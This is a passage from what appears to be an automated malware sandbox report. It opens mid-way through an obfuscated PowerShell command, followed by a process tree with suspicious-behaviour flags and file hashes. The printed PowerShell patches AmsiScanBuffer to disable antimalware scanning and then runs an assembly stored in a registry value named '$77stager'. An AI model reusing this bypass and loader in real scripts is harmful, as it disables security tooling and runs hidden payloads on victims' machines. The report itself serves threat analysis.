+'');Write-Output $UBFuRTnJPRU.CreateType();}$VaMTcanOfxBIE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'te'+[Char](109)+''+'.'+''+'d'+'l'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+'f'+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+'3'+[Char](50)+''+'.'+'Un'+[Char](115)+''+[Char](97)+''+'f'+'eN'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+'od'+[Char](115)+'');$VXZVbWuwBjekkC=$VaMTcanOfxBIE.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+'ro'+'c'+'A'+'d'+''+[Char](100)+''+[Char](114)+'e'+'s'+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TkJKCUWyAPkdSvGjPSH=tPwiuzgtHLaD @([String])([IntPtr]);$ezIECILNJvChcvhVGgCEdC=tPwiuzgtHLaD @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CnlPJGGirGM=$VaMTcanOfxBIE.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+'l'+'eHa'+'n'+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+'.'+'d'+'ll')));$WQUvaEyNueLdIo=$VXZVbWuwBjekkC.Invoke($Null,@([Object]$CnlPJGGirGM,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+'L'+'i'+''+'b'+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$TpSyVFxzcyhKzUtWk=$VXZVbWuwBjekkC.Invoke($Null,@([Object]$CnlPJGGirGM,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$SsRvezc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WQUvaEyNueLdIo,$TkJKCUWyAPkdSvGjPSH).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$rdQVPHMMLBNKhmtfd=$VXZVbWuwBjekkC.Invoke($Null,@([Object]$SsRvezc,[Object]('A'+[Char](109)+'s'+'i'+''+'S'+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+'u'+'f'+''+[Char](102)+'er')));$QzBgkdHqOC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TpSyVFxzcyhKzUtWk,$ezIECILNJvChcvhVGgCEdC).Invoke($rdQVPHMMLBNKhmtfd,[uint32]8,4,[ref]$QzBgkdHqOC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rdQVPHMMLBNKhmtfd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TpSyVFxzcyhKzUtWk,$ezIECILNJvChcvhVGgCEdC).Invoke($rdQVPHMMLBNKhmtfd,[uint32]8,0x20,[ref]$QzBgkdHqOC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+'7'+''+'7'+''+[Char](115)+''+[Char](116)+''+'a'+'g'+'e'+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3292
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\system32\sihost.exesihost.exe2⤵PID:1828
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2464
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:764
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:1928
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2976
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:432
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1544
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1988
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2052
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2148
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2232
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2824
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2892
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3432
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3520 -
C:\Users\Admin\AppData\Local\Temp\fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe"C:\Users\Admin\AppData\Local\Temp\fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe"2⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Users\Admin\AppData\Local\Temp\$77ef04f5"C:\Users\Admin\AppData\Local\Temp\$77ef04f5"3⤵
- Executes dropped EXE
PID:2028
-
-
C:\Users\Admin\AppData\Local\Temp\$77c2e67a"C:\Users\Admin\AppData\Local\Temp\$77c2e67a"3⤵
- Executes dropped EXE
PID:1188
-
-
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4496
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:5100
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2016
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:516
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:3036
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1468
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{8805baa3-45a8-47ba-9111-4d387c5ffb2a}1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2504
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:1448
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000118 000000841⤵
- Suspicious behavior: LoadsDriver
PID:1828
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000f4 000000841⤵PID:764
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000d8 000000841⤵PID:3536
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000f0 000000841⤵PID:3292
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000118 000000841⤵PID:1188
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000150 000000841⤵PID:3652
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000160 000000841⤵PID:4132
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000184 000000841⤵PID:2808
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 0000018c 000000841⤵PID:3488
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000240 000000841⤵PID:1928
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000258 000000841⤵PID:4532
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000001a4 000000841⤵PID:2660
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000001b0 000000841⤵PID:3984
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 0000024c 000000841⤵PID:616
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 0000011c 000000841⤵PID:332
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000114 000000841⤵PID:3836
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000180 000000841⤵PID:2676
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000b8 000000841⤵PID:2464
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000a0 000000841⤵PID:1808
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.5MB
MD596422a2b982c99614d31dff7f2b64680
SHA1e8f25aa518b0ef54bcdf770479ef28dd99dd8efc
SHA256fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16
SHA512882beba69a0ab2d6f7d048ecb4666b9ba4fe3ea17387ece13fb5bd589ce0db4d7343fbce6e2d836192aed2a920aae4edd1f4b6fa090fe807d54e024dbc234de9
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82